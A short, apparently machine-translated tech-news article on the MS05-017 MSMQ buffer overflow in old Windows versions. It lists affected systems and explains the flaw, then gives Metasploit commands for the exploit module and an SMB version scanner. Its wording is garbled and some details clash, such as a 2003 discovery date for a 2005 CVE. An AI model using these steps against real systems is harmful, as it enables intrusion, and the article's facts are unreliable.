Shulou(Shulou.com)06/01 Report--

Description of this vulnerability was discovered by the lds-pl.net vulnerability research group on July 16, 2003. after the vulnerability and exp were made public on the Internet, a large number of instances appeared on the Internet, and a large number of worms that took advantage of this vulnerability also appeared. Vulnerability number CVE-2005-0059OSVDB-15458MSB-MS05-017BID-13112 × × × the server side of the target DCOM interface affects the system Microsoft Windows XP Service Pack 1 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) Microsoft Windows 2000 Service Pack 4 Microsoft Windows 2000 Service Pack 3 Microsoft Windows 98 Second Edition (SE) Microsoft Windows 98 vulnerability principle msmq does not perform correct verification before passing the input string to the buffer, so A buffer overflow vulnerability can be triggered by passing a specially crafted msmq message. Vulnerabilities can lead to remote code execution and local rights escalation. Because msmq concept explanation 1. Msmq (MicroSoft Message Queuing, Microsoft message queue) is an asynchronous message transmission mode that communicates with each other among many different applications, the applications that communicate with each other can be located on the same machine or distributed anywhere in cyberspace. The principle of msmq implementation: the sender sends the message to a message and then saves it to a message queue (Message Queuing) in the public space of the system. The application that needs to accept the message takes the Message from the Message Queuing for processing. Msmq needs to communicate with hostname when passing messages. Metasploit exp available target Windows 2000 ALL Windows XP SP0-SP1 (English) metasploit leverages ms05-017s

Netbios hostname, ip and port are needed to use this payload.

Use exploit/windows/dcerpc/ms05_017_msmqset hname set rhost set rport run-j

View hname in msf

Use scanner/smb/smb_versionset rhost set threads 24run using ms05-017s without metasploit has not been found yet. Follow-up supplementary reference article MS05-017Microsoft Message Queueing Service Path OverflowVirus EncyclopediaMSMQ

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.